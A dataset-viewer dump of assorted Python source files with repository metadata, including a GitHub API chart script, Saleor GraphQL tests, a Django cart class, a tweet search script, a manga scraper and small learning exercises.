answer = models.CharField(max_length=30)
| [
"sultangaziev01@bk.ru"
] | sultangaziev01@bk.ru |
df168a8023119311931f1cfac20f2fad47c90e2e | 19fa45bfc16ba8c4856c0c4de8a9491714e77c3c | /PythonLearningDemo/python_repos.py | a9c7a3f44e41344106bc87e5940b77fd2afdb8fc | [] | no_license | JoyUCUU/QA | 046971d84d13b75155b91201267f7374e93d30cf | acff032c481be1483e05cf478bb6f07039c4048f | refs/heads/master | 2021-01-18T12:54:46.219302 | 2018-07-23T12:10:59 | 2018-07-23T12:10:59 | 84,333,986 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,517 | py | import requests
import requests
import pygal
from pygal.style import LightColorizedStyle as LCS,LightenStyle as LS
#执行API调用并存储相应
url = 'https://api.github.com/search/repositories?q=language:python&sort=stars'
r = requests.get(url)
print("Status Code: " ,r.status_code)
#将API的响应存储到一个变量中
response_dict = r.json()
print("Total repositories:",response_dict['total_count'])
#探索有关仓库的信息
repo_dicts = response_dict['items']
print("Repositories returned:",len(repo_dicts))
names,plot_dicts = [],[]
for repo_dict in repo_dicts:
names.append(repo_dict['name'])
plot_dict = dict(value=repo_dict['stargazers_count'], xlink=repo_dict['html_url'], label=repo_dict['description'])
plot_dicts.append(plot_dict)
# names,stars = [],[]
# for repo_dict in repo_dicts:
# names.append(repo_dict['name'])
# stars.append(repo_dict['stargazers_count'])
#可视化
my_style = LS('#333366',base_style=LCS)
chart = pygal.Bar(style = my_style,x_label_rotation = 45,show_legend = False)
chart.title = "Most-starred Python Project on GitHub"
chart.x_labels = names
chart.add('',plot_dicts)
chart.render_to_file('python_repos1.svg')
#研究第一个仓库
#repo_dict = repo_dicts[0]
# for repo_dict in repo_dicts:
# print('\nName:',repo_dict['name'])
# print('Owner:',repo_dict['owner']['login'])
# print('Stars:',repo_dict['stargazers_count'])
# print('Repository',repo_dict['html_url'])
# print('Description',repo_dict['description'])
| [
"your_email@youremail.com"
] | your_email@youremail.com |
b0162723ed29495537ea9a9eec04cca7e4c319e7 | 3a533d1503f9a1c767ecd3a29885add49fff4f18 | /saleor/graphql/tax/tests/queries/test_tax_configuration.py | 73297b2699c9d21b07e645750f303df73f7fd48c | [
"BSD-3-Clause"
] | permissive | jonserna/saleor | 0c1e4297e10e0a0ce530b5296f6b4488f524c145 | b7d1b320e096d99567d3fa7bc4780862809d19ac | refs/heads/master | 2023-06-25T17:25:17.459739 | 2023-06-19T14:05:41 | 2023-06-19T14:05:41 | 186,167,599 | 0 | 0 | BSD-3-Clause | 2019-12-29T15:46:40 | 2019-05-11T18:21:31 | TypeScript | UTF-8 | Python | false | false | 3,467 | py | import graphene
from saleor.tax.models import TaxConfiguration
from ....tests.utils import assert_no_permission, get_graphql_content
from ..fragments import TAX_CONFIGURATION_FRAGMENT
QUERY = (
"""
query TaxConfiguration($id: ID!) {
taxConfiguration(id: $id) {
...TaxConfiguration
}
}
"""
+ TAX_CONFIGURATION_FRAGMENT
)
def _test_field_resolvers(tax_configuration: TaxConfiguration, data: dict):
country_exceptions = tax_configuration.country_exceptions.all()
country_exception = country_exceptions[0]
assert data["id"] == graphene.Node.to_global_id(
"TaxConfiguration", tax_configuration.pk
)
assert data["chargeTaxes"] == tax_configuration.charge_taxes
assert data["displayGrossPrices"] == tax_configuration.display_gross_prices
assert data["pricesEnteredWithTax"] == tax_configuration.prices_entered_with_tax
assert len(data["countries"]) == len(country_exceptions)
assert data["countries"][0]["country"]["code"] == country_exception.country.code
assert data["countries"][0]["chargeTaxes"] == country_exception.charge_taxes
assert (
data["countries"][0]["displayGrossPrices"]
== country_exception.display_gross_prices
)
def test_tax_configuration_query_no_permissions(channel_USD, user_api_client):
# given
id = graphene.Node.to_global_id(
"TaxConfiguration", channel_USD.tax_configuration.pk
)
variables = {"id": id}
# when
response = user_api_client.post_graphql(QUERY, variables, permissions=[])
# then
assert_no_permission(response)
def test_tax_configuration_query_staff_user(channel_USD, staff_api_client):
# given
id = graphene.Node.to_global_id(
"TaxConfiguration", channel_USD.tax_configuration.pk
)
variables = {"id": id}
# when
response = staff_api_client.post_graphql(QUERY, variables)
# then
content = get_graphql_content(response)
_test_field_resolvers(
channel_USD.tax_configuration, content["data"]["taxConfiguration"]
)
def test_tax_configuration_query_app(channel_USD, app_api_client):
# given
id = graphene.Node.to_global_id(
"TaxConfiguration", channel_USD.tax_configuration.pk
)
variables = {"id": id}
# when
response = app_api_client.post_graphql(QUERY, variables)
# then
content = get_graphql_content(response)
_test_field_resolvers(
channel_USD.tax_configuration, content["data"]["taxConfiguration"]
)
TAX_CONFIGURATION_PRIVATE_METADATA_QUERY = """
query TaxConfiguration($id: ID!) {
taxConfiguration(id: $id) {
id
privateMetadata {
key
value
}
}
}
"""
def test_tax_class_private_metadata_requires_manage_taxes_app(
app_api_client, channel_USD, permission_manage_taxes
):
# given
id = graphene.Node.to_global_id(
"TaxConfiguration", channel_USD.tax_configuration.pk
)
variables = {"id": id}
# when
response = app_api_client.post_graphql(
TAX_CONFIGURATION_PRIVATE_METADATA_QUERY,
variables,
permissions=[permission_manage_taxes],
)
# then
content = get_graphql_content(response)
data = content["data"]["taxConfiguration"]
assert data["id"] == graphene.Node.to_global_id(
"TaxConfiguration", channel_USD.tax_configuration.pk
)
assert data["privateMetadata"]
| [
"noreply@github.com"
] | jonserna.noreply@github.com |
923fbbb3366566898a71cf15294ef39fc1dc4139 | 6d0f6cc613c6f1a61b787c8cc1ef9a20895be40c | /django-cielo-exemplo/apps/carrinho/cart.py | 2568e3f07c18169eeefc6fa2e5797e2ed6b0e6dc | [
"Apache-2.0"
] | permissive | vitorh45/django-ecommerce-exemplo1 | 7f3f4887a118439b8de305044392e9baa381cf23 | c033ff2eca70230f676f8bd95d0bd5ecd89948a4 | refs/heads/master | 2016-09-15T18:42:38.600694 | 2013-09-08T05:23:26 | 2013-09-08T05:23:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,958 | py | # -*- coding: utf-8 -*-
import datetime
import models
from django.utils.formats import number_format
from apps.cart import Cart as Cart_
from apps.cart.models import Cart, Item
class CustomCart(Cart_):
def add(self, product, size, quantity=1):
try:
item = models.Item.objects.get(
cart=self.cart,
product=product,
size=size,
)
item.quantity += quantity
item.save()
except models.Item.DoesNotExist:
item = models.Item()
item.cart = self.cart
item.product = product
item.quantity = quantity
item.size = size
if product.em_promocao:
item.unity_price = product.preco_promocao
else:
item.unity_price = produto.preco
item.save()
def verificar_quantidade(self,produto,tamanho):
try:
item = models.Item.objects.get(carrinho=self.carrinho,produto=produto,tamanho=tamanho)
return item.quantidade
except:
return 0
def preco_total(self):
total = 0
for item in models.Item.objects.select_related().filter(carrinho=self.carrinho):
total += item.preco_total
return total
def preco_total_formatado(self):
total = 0
for item in models.Item.objects.select_related().filter(carrinho=self.carrinho):
total += item.preco_total
return number_format(total,2)
def peso_total(self):
total = 0
for item in models.Item.objects.select_related().filter(carrinho=self.carrinho):
total += item.product.peso * item.quantity
return total
def quantidade(self):
quantidade = len(self.cart.item_set.all())
| [
"vitorh45@gmail.com"
] | vitorh45@gmail.com |
222685f51ec56d50a935508b87c66af2db694e28 | 396f93d8e73c419ef82a94174815a2cecbb8334b | /.history/tester2_20200322005203.py | dc127637a831840c9f18cc1ca90688e8540b41dc | [] | no_license | mirfarzam/ArtificialIntelligence-HeuristicAlgorithm-TabuSearch | 8c73d9448b916009c9431526864a4441fdeb682a | 90b2dca920c85cddd7c1b3335344ac7b10a9b061 | refs/heads/master | 2021-03-26T21:16:42.561068 | 2020-04-17T21:44:26 | 2020-04-17T21:44:26 | 247,750,502 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,014 | py | import os
import subprocess
import re
from datetime import datetime
import time
from statistics import mean
numberOfTests = 1000
tabuIteration = '1000'
tabuDuration = '10'
numberOfCities = '50'
final_solution = []
list_coverage = []
local_minimum = []
print(f"\n\nTest for Tabu Search with this config: \n\tIterations : {tabuIteration} \n\tDuration(Tabu Memory): {tabuDuration} \n\tNumber of Cities: {numberOfCities}")
for i in range(0, numberOfTests):
process = subprocess.Popen(['./algo_tabou.exe', tabuIteration , tabuDuration, numberOfCities, 'distances_entre_villes_{}.txt'.format(numberOfCities)],stdout=subprocess.PIPE,stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
result = stdout
result = re.sub(r'\s', ' ', str(result))
solution = (re.findall(r'([0-9]{4,7}) km', result))[-1]
final_solution.append(int(solution))
coverage = re.findall(r'On est dans un minimum local a l\'iteration ([0-9]+) ->', result)
if coverage != []:
coverage = int(coverage[0])+ 1
local_minimum.append(int(solution))
else:
coverage = int(tabuIteration)
number_of_solution_before_coverage = coverage
list_coverage.append(coverage)
print('best found solution is {} and found in interation {}, number of solutions before coverage : {}'.format(solution, coverage, number_of_solution_before_coverage))
time.sleep( 1 )
print("Summary:")
optimum_result = len(list(filter(lambda x: x == 5644, final_solution)))
print(f'number of optimum solution found is {optimum_result}, so in {numberOfTests} runs of test we faced {(optimum_result/numberOfTests)*100}% coverage')
print(f'in average this test shows that we found the global optimum solution in iteration {mean(list_coverage)}\nand in worst we found it in iteration {max(list_coverage)} \nand in best case in iteration {max(list_coverage)}')
print(f'Totally, {sum(list_coverage)} cities visited before finding the global optimum in {numberOfTests} runs of this test\n\n\n')
print(f'') | [
"farzam.mirmoeini@gmail.com"
] | farzam.mirmoeini@gmail.com |
f3e047c6d5a259010568b73807716e530bc4005d | 3481023b43028c5ee9520a8be0978e914bdcb548 | /manga_py/providers/mang_as.py | 27238087ebc8dca9f1a40bcd29d161ac214b695c | [
"MIT"
] | permissive | manga-py/manga-py | 18f6818d8efc96c3e69efee7dff3f3d6c773e32a | 0db97123acab1f2fb99e808b0ba54db08977e5c8 | refs/heads/stable_1.x | 2023-08-20T03:04:06.373108 | 2023-04-16T08:28:15 | 2023-04-16T08:28:15 | 98,638,892 | 444 | 56 | MIT | 2023-07-27T13:21:40 | 2017-07-28T10:27:43 | Python | UTF-8 | Python | false | false | 1,185 | py | from sys import stderr
from manga_py.provider import Provider
from .helpers.std import Std
class MangAs(Provider, Std):
def get_chapter_index(self) -> str:
idx = self.re.search('/manga/[^/]+/([^/]+)', self.chapter).group(1)
return idx.replace('.', '-')
def get_content(self):
return self._get_content('{}/manga/{}')
def get_manga_name(self) -> str:
return self._get_name('/manga/([^/]+)')
def get_chapters(self):
return self._elements('.chapter-title-rtl > a')
def get_files(self):
content = self.http_get(self.chapter)
self.http().referer = self.chapter
items = self.re.search(r'var\s+pages\s*=\s*(\[.+\])', content)
if not items:
self.log('Images not found!', file=stderr)
return []
n = self.normalize_uri
items = self.json.loads(items.group(1))
return [n(i.get('page_image')) for i in items]
def prepare_cookies(self):
self._base_cookies(self.get_url())
def get_cover(self) -> str:
return self._cover_from_content('.boxed > img.img-responsive')
def book_meta(self) -> dict:
pass
main = MangAs
| [
"sttv-pc@mail.ru"
] | sttv-pc@mail.ru |
00d37ef5a44949f4d28a68655229c1733d6e2627 | da687718aa8ce62974090af63d25e057262e9dfe | /cap08-numeros/03_random.py | db2785183561b4bbf0cdc15b8b4c5a6a79ce731f | [] | no_license | frclasso/revisao_Python_modulo1 | 77928fa4409c97d49cc7deccdf291f44c337d290 | 1e83d0ef9657440db46a8e84b136ac5f9a7c556e | refs/heads/master | 2020-06-25T05:37:28.768343 | 2019-07-27T22:23:58 | 2019-07-27T22:23:58 | 199,217,969 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 589 | py | #!/usr/bin/env python3
# importando o modulo random
import random
# random numbers
print(random.random()) # imprime um numero entre 0 e 1
decider = random.randrange(2) # 0 OU 1
if decider == 0:
print('HEADS')
else:
print('TAILS')
print(f'Decider is:', decider)
print("You rolled a " + str(random.randrange(1, 7)))
megaSena = random.sample(range(61), 6) # range de 0 a 60, gerando 6 numeros
print(megaSena)
# random choices
possiblePets = ['cat', 'dog', 'fish']
print(random.choice(possiblePets))
cards = ['Jack', 'Queen', 'Ace', 'King']
random.shuffle(cards)
print(cards) | [
"frcalsso@yahoo.com.br"
] | frcalsso@yahoo.com.br |
02c87dfe25889db419238131737049196a75d3fd | f36999827ad651b5ff2fd4b20d7c0245d5f30cfe | /twi_search_sht_01.py | 7912ed0564577b9c68a69549a85199199c5ca20f | [] | no_license | axuaxu/twi-src | cbcfe6891539d568c9ecece0db531984d7552094 | 3347c7d4ebd94c3399a7427427745fa73fe8463e | refs/heads/master | 2021-07-11T09:07:58.013503 | 2017-10-15T17:15:10 | 2017-10-15T17:15:10 | 105,077,369 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,568 | py | import tweepy
from credentials import *
import sys
#import jsonpickle
import os
import codecs
import datetime
import json
auth = tweepy.AppAuthHandler(consumer_key, consumer_secret)
#auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth, wait_on_rate_limit=True,
wait_on_rate_limit_notify=True)
if (not api):
print ("Can't Authenticate")
sys.exit(-1)
def TwiShort(out,shtFile):
outF = open(out,'r')
sFile = open(shtFile,'w')
print shtFile
for twi in outF:
shtStr = twi._json.retweet_count
print shtStr
sFile.write(shtStr)
def TwiSearch(que,fName,sinceId,max_id):
searchQuery = que
# this is what we're searching for
maxTweets = 10000000 # Some arbitrary large number
tweetsPerQry = 100 # this is the max the API permits
# We'll store the tweets in a text file.
# If results from a specific ID onwards are reqd, set since_id to that ID.
# else default to no lower limit, go as far back as API allows
# If results only below a specific ID are, set max_id to that ID.
# else default to no upper limit, start from the most recent tweet matching the search query.
tweetCount = 0
print("Downloading max {0} tweets".format(maxTweets))
with open(fName, 'w') as f:
while tweetCount < maxTweets:
try:
if (max_id <= 0):
if (not sinceId):
new_tweets = api.search(q=searchQuery, count=tweetsPerQry)
else:
new_tweets = api.search(q=searchQuery, count=tweetsPerQry,
since_id=sinceId)
else:
if (not sinceId):
new_tweets = api.search(q=searchQuery, count=tweetsPerQry,
max_id=str(max_id - 1))
else:
new_tweets = api.search(q=searchQuery, count=tweetsPerQry,
max_id=str(max_id - 1),
since_id=sinceId)
if not new_tweets:
print("No more tweets found")
break
for tweet in new_tweets:
# f.write(jsonpickle.encode(tweet._json, unpicklable=False) +
# '\n')
f.write(str(tweet._json)+'\n')
print "\nid "+str(tweet._json['id'])
print "\nretwi "+str(tweet._json['retweet_count'])
fav = tweet._json.favorite_count
tweetCount += len(new_tweets)
print("\nDownloaded {0} tweets".format(tweetCount))
max_id = new_tweets[-1].id
except tweepy.TweepError as e:
# Just exit if any error
print("some error : " + str(e))
break
print ("Downloaded {0} tweets, Saved to {1}".format(tweetCount, fName))
logStr = "Downloaded {0} tweets, Saved to {1}".format(tweetCount, fName)
return logStr
#print "\nshortFile"+shtFile
#pass
#que = '#georgiaokeeffe'
#outName = 'tweets-01.txt'
sinceId = None
max_id = -1L
#TwiSearch(que,outName,sinceId,max_id)
now = datetime.datetime.now()
timestr = str(now).replace(' ','-').replace(':','-')
#print str(now)+'\n'+timestr+'\n'+timestr[:19]
twi = "twi_query_list.txt"
#fout = codecs.open(out,"w",encoding="utf-8")
ftwi = codecs.open(twi,'r',encoding="utf-8")
count = 100
cdir = '.\\status-query'
srcDown = '.\\status-query-down'
logFile = cdir+'\\log-que-'+timestr[:16]+'.txt'
logStr = ""
#maxid = 9999999999999999999
shtFile=""
for que in ftwi:
#maxid = getMaxID(que,cdir,srcDown,sinceId,max_id)
#print "twi_id:"+twi_id+" maxid:"+str(maxid)
out = cdir+'\\que-'+que+'-'+timestr[:16]+'.txt'
out = out.replace('\r\n','')
print "\ninput: "+ que+"\noutput: "+out
logStr = logStr+"\ninput: "+ que+"\noutput: "+out
logStr = logStr+TwiSearch(que,out,sinceId,max_id)
logF = open(logFile,'w')
logF.write(logStr)
twi = "twi_query_list.txt"
#fout = codecs.open(out,"w",encoding="utf-8")
ftwi = codecs.open(twi,'r',encoding="utf-8")
for que in ftwi:
out = cdir+'\\que-'+que+'-'+timestr[:16]+'.txt'
out = out.replace('\r\n','')
shtFile = out.replace('que-','sht-que-')
#tShort = TwiShort(out,shtFile)
#fout = codecs.open(out,"w",encoding="utf-8")
#fout.write(tstatus)
| [
"axu0110@gmail.com"
] | axu0110@gmail.com |
f7793911f3d5f2ab90020e6656f60bbb34963128 | 9f594f95fabf672df31c451ef758f1dd979d20e4 | /agsci/seo/__init__.py | 208daa14b09f51282fb42de2b027d9d6443ba431 | [] | no_license | tsimkins/agsci.seo | 0d37fea8f8a736a5109e050bbb82e90e4233a0a3 | 39b31b5df21961cbd278851dc3a53f71937fa84a | refs/heads/master | 2020-12-30T10:36:47.454391 | 2018-06-18T14:52:43 | 2018-06-18T14:52:43 | 26,601,072 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,160 | py | from Products.CMFCore.utils import getToolByName
from Products.PythonScripts.Utility import allow_module
from zope.i18nmessageid import MessageFactory
from DateTime import DateTime
seoMessageFactory = MessageFactory('agsci.seo')
allow_module('agsci.seo')
exclude_types = [
'Cardinality Constraint',
'Content Reference',
'FSDCommittee',
'FSDCommitteeMembership',
'FSDCommitteesFolder',
'FSDCourse',
'FSDDepartment',
'FSDDepartmentalMembership',
'FSDFacultyStaffDirectoryTool',
'FSDPersonGrouping',
'FSDSpecialtiesFolder',
'FSDSpecialty',
'FSDSpecialtyInformation',
'FieldsetEnd',
'FieldsetFolder',
'FieldsetStart',
'FormBooleanField',
'FormConfirmationPage',
'FormMailerAdapter',
'FormMultiSelectionField',
'FormRichLabelField',
'FormSaveDataAdapter',
'FormSelectionField',
'FormStringField',
'FormTextField',
'FormThanksPage',
'Interface Constraint',
'Inverse Implicator',
'Link',
'Newsletter',
'Relations Library',
'Ruleset Collection',
'Ruleset',
'TalkEvent',
'Type Constraint',
]
def initialize(context):
pass | [
"trs22@psu.edu"
] | trs22@psu.edu |
20e5c44e7c4bffe2d3c42c00cb01c58c6a6f4c9f | d886bbef4caafefc1796e77d41d7c7fdddbb4794 | /mb/__init__.py | 22b50fb108b7696e26f4c3bf7d0d376a66a26c1f | [] | no_license | coryshain/pyModelBlocks | 4864a23e4e8452340797fdbc60338ad5e579d14f | ba25bf5d5279962675763f3c30b6452dbae15d25 | refs/heads/master | 2020-08-26T21:30:55.126202 | 2019-11-11T21:12:38 | 2019-11-11T21:12:38 | 217,154,233 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 417 | py | from mb.util.general import *
from mb.core.general.core import *
from mb.core.general.text import *
from mb.core.general.table import *
from mb.core.general.tree import *
from mb.core.parsing.core import *
from mb.core.regression import *
from mb.core.regression.lmer import *
from mb.core.regression.cdr import *
from mb.external_resources.ptb import *
from mb.external_resources.natstor import *
| [
"cory.shain@gmail.com"
] | cory.shain@gmail.com |
f9216e0b85abadad6d47ea519c87ced608c69d2a | 897802abf4ee5c7267de3eb5e321cc931898e2f6 | /python/python/songTian/part0_base/week02/c231_z_draw/__init__.py | 3186d069bc19e4cc6cb986cd688cddf78bfa3f9b | [] | no_license | aojie654/codes_store | 0527c7a7729b472e8fd2fd67af462cf857970633 | ed71b6266b2d2b5ddefadcb958f17695fb9db6cf | refs/heads/master | 2021-07-15T17:04:33.591673 | 2021-07-03T14:42:30 | 2021-07-03T14:42:30 | 132,343,733 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 234 | py | import turtle
# turtle.left(45)
turtle.penup()
turtle.bk(200)
turtle.pendown()
turtle.fd(150)
turtle.right(135)
turtle.fd(300)
turtle.left(135)
turtle.fd(150)
turtle.penup()
turtle.goto(100,150)
turtle.pendown()
turtle.circle(50,360)
| [
"aojie654@live.cn"
] | aojie654@live.cn |
f09ddbf128cad3f9efabae34ddc77bf3a77764f0 | 078918048099dfa2454cfac2d449ea3d77fbec55 | /452-minimum-number-of-arrows-to-burst-balloons.py | 370660e7078631a2893e6cedf203d00f19083f7a | [] | no_license | DmitryVlaznev/leetcode | 931784dcc4b465eebda7d22311f5bf5fa879f068 | b2a2afdfc725330545c9a2869fefc7d45ec594bc | refs/heads/master | 2023-06-10T05:42:34.992220 | 2023-06-05T09:54:10 | 2023-06-05T09:54:30 | 241,064,389 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,594 | py | # 452. Minimum Number of Arrows to Burst Balloons
# There are some spherical balloons spread in two-dimensional space. For
# each balloon, provided input is the start and end coordinates of the
# horizontal diameter. Since it's horizontal, y-coordinates don't
# matter, and hence the x-coordinates of start and end of the diameter
# suffice. The start is always smaller than the end.
# An arrow can be shot up exactly vertically from different points along
# the x-axis. A balloon with xstart and xend bursts by an arrow shot at
# x if xstart ≤ x ≤ xend. There is no limit to the number of arrows that
# can be shot. An arrow once shot keeps traveling up infinitely.
# Given an array points where points[i] = [xstart, xend], return the
# minimum number of arrows that must be shot to burst all balloons.
# Example 1:
# Input: points = [[10,16],[2,8],[1,6],[7,12]]
# Output: 2
# Explanation: One way is to shoot one arrow for example at x = 6 (bursting the balloons [2,8] and [1,6]) and another arrow at x = 11 (bursting the other two balloons).
# Example 2:
# Input: points = [[1,2],[3,4],[5,6],[7,8]]
# Output: 4
# Example 3:
# Input: points = [[1,2],[2,3],[3,4],[4,5]]
# Output: 2
# Example 4:
# Input: points = [[1,2]]
# Output: 1
# Example 5:
# Input: points = [[2,3],[2,3]]
# Output: 1
# Constraints:
# 0 <= points.length <= 104
# points.length == 2
# -231 <= xstart < xend <= 231 - 1
from typing import List
from utils import checkValue
class Solution:
def findMinArrowShots(self, points: List[List[int]]) -> int:
if len(points) < 2: return len(points)
import functools
def comparator(a, b):
if a[0] < b[0]: return -1
if a[0] > b[0]: return 1
if a[1] > b[1]: return -1
if a[1] < b[1]: return 1
return 0
points.sort(key=functools.cmp_to_key(comparator))
arrows, intersection = 0, points[0]
for i in range(1, len(points)):
p = points[i]
if p[0] <= intersection[1]:
intersection[0] = max(intersection[0], p[0])
intersection[1] = min(intersection[1], p[1])
else:
arrows += 1
intersection = p
return arrows + 1
t = Solution()
checkValue(2 , t.findMinArrowShots([[10,16],[2,8],[1,6],[7,12]]))
checkValue(4 , t.findMinArrowShots([[1,2],[3,4],[5,6],[7,8]]))
checkValue(2 , t.findMinArrowShots([[1,2],[2,3],[3,4],[4,5]]))
checkValue(1 , t.findMinArrowShots([[1,2]]))
checkValue(0 , t.findMinArrowShots([]))
checkValue(1 , t.findMinArrowShots([[2,3],[2,3]])) | [
"dmitry.vlaznev@datadvance.net"
] | dmitry.vlaznev@datadvance.net |
e85356b804f2734ce5dbfaf2d8f1d7ce277df17f | 78743e6b4f07a466d9b43e462f2d687443bf8538 | /phkit/english/__init__.py | 3ad48a32dab7797f62fdaa4cf8cbdc65b881d773 | [
"MIT"
] | permissive | tomguluson92/phkit | 9bac08019cc9f742ac82fa24a51e33448bb735da | ff6cd9114aa8a3737c05f0d4bba5d4da766770a0 | refs/heads/master | 2022-10-04T19:13:03.829071 | 2020-06-01T03:10:59 | 2020-06-01T03:10:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,789 | py | """
## english
from https://github.com/keithito/tacotron "
Cleaners are transformations that run over the input text at both training and eval time.
Cleaners can be selected by passing a comma-delimited list of cleaner names as the "cleaners"
hyperparameter. Some cleaners are English-specific. You'll typically want to use:
1. "english_cleaners" for English text
2. "transliteration_cleaners" for non-English text that can be transliterated to ASCII using
the Unidecode library (https://pypi.python.org/pypi/Unidecode)
3. "basic_cleaners" if you do not want to transliterate (in this case, you should also update
the symbols in symbols.py to match your data).
"""
import re
import random
from . import cleaners
from .symbols import symbols
# Mappings from symbol to numeric ID and vice versa:
_symbol_to_id = {s: i for i, s in enumerate(symbols)}
_id_to_symbol = {i: s for i, s in enumerate(symbols)}
# Regular expression matching text enclosed in curly braces:
_curly_re = re.compile(r'(.*?)\{(.+?)\}(.*)')
def get_arpabet(word, dictionary):
word_arpabet = dictionary.lookup(word)
if word_arpabet is not None:
return "{" + word_arpabet[0] + "}"
else:
return word
def text_to_sequence(text, cleaner_names, dictionary=None, p_arpabet=1.0):
'''Converts a string of text to a sequence of IDs corresponding to the symbols in the text.
The text can optionally have ARPAbet sequences enclosed in curly braces embedded
in it. For example, "Turn left on {HH AW1 S S T AH0 N} Street."
Args:
text: string to convert to a sequence
cleaner_names: names of the cleaner functions to run the text through
dictionary: arpabet class with arpabet dictionary
Returns:
List of integers corresponding to the symbols in the text
'''
sequence = []
space = _symbols_to_sequence(' ')
# Check for curly braces and treat their contents as ARPAbet:
while len(text):
m = _curly_re.match(text)
if not m:
clean_text = _clean_text(text, cleaner_names)
if dictionary is not None:
clean_text = [get_arpabet(w, dictionary)
if random.random() < p_arpabet else w
for w in clean_text.split(" ")]
for i in range(len(clean_text)):
t = clean_text[i]
if t.startswith("{"):
sequence += _arpabet_to_sequence(t[1:-1])
else:
sequence += _symbols_to_sequence(t)
sequence += space
else:
sequence += _symbols_to_sequence(clean_text)
break
clean_text = _clean_text(text, cleaner_names)
sequence += _symbols_to_sequence(_clean_text(m.group(1), cleaner_names))
sequence += _arpabet_to_sequence(m.group(2))
text = m.group(3)
# remove trailing space
sequence = sequence[:-1] if sequence[-1] == space[0] else sequence
return sequence
def sequence_to_text(sequence):
'''Converts a sequence of IDs back to a string'''
result = []
for symbol_id in sequence:
if symbol_id in _id_to_symbol:
s = _id_to_symbol[symbol_id]
# Enclose ARPAbet back in curly braces:
if len(s) > 1 and s[0] == '@':
s = '{%s}' % s[1:]
result.append(s)
result = ''.join(result)
return result.replace('}{', ' ')
def _clean_text(text, cleaner_names):
for name in cleaner_names:
cleaner = getattr(cleaners, name)
if not cleaner:
raise Exception('Unknown cleaner: %s' % name)
text = cleaner(text)
return text
def _symbols_to_sequence(symbols):
return [_symbol_to_id[s] for s in symbols if _should_keep_symbol(s)]
def _arpabet_to_sequence(text):
return _symbols_to_sequence(['@' + s for s in text.split()])
def _should_keep_symbol(s):
return s in _symbol_to_id and s is not '_' and s is not '~'
| [
"kqhyj@163.com"
] | kqhyj@163.com |
283beabf89838afcd66883c346c7a93bfba3840a | 89cd8b77ad5171c336cc60b2133fe6468a6cb53f | /Module01_CZ/day6_data_structure/04-代码/day6/102_元组.py | 2a44d5053791d093d0eafa1f4fa309c5bf6d9cd2 | [
"MIT"
] | permissive | fenglihanxiao/Python | 75178f6b6b0c53345e1ed54226ea645216572d6c | 872baf3a3a5ee42740161152605ca2b1ddf4cd30 | refs/heads/master | 2021-05-23T18:49:20.656433 | 2020-04-29T01:06:21 | 2020-04-29T01:06:21 | 253,199,073 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 254 | py | """
演示元组
"""
tuple1 = (1,2,3,"itcast","黑马程序员",True,False)
print(tuple1)
tuple2 = (100,)
print(tuple2)
# tuple3 = ("itcast") #不是元组
# print(type(tuple3))
# print(tuple1[4])
# tuple1[4] = "heima"
for data in tuple1:
print(data) | [
"fenglihanxiao@qq.com"
] | fenglihanxiao@qq.com |
9b371d5b80d4dc46d3a0bcdd75543261fb3c344c | 29d09c634ffdd8cab13631d62bc6e3ad00df49bf | /Algorithm/swexpert/1234_비밀번호.py | d93923dd1ba591415e9c6fd6a7dc893fdd765f2b | [] | no_license | kim-taewoo/TIL_PUBLIC | f1d32c3b4f46344c1c99f02e95cc6d2a888a0374 | ae86b542f8b1805b5dd103576d6538e3b1f5b9f4 | refs/heads/master | 2021-09-12T04:22:52.219301 | 2021-08-28T16:14:11 | 2021-08-28T16:14:11 | 237,408,159 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 428 | py | T = 10
for t in range(1, T+1):
n, s = input().split()
n = int(n)
s = list(s)
while True:
flag = False
i = 1
while i < n:
if s[i-1] == s[i]:
flag = True
s = s[:i-1] + s[i+1:]
n -= 2
else:
i += 1
if not flag:
break
result = "".join(s)
print("#{} {}".format(t, result)) | [
"acoustic0419@gmail.com"
] | acoustic0419@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.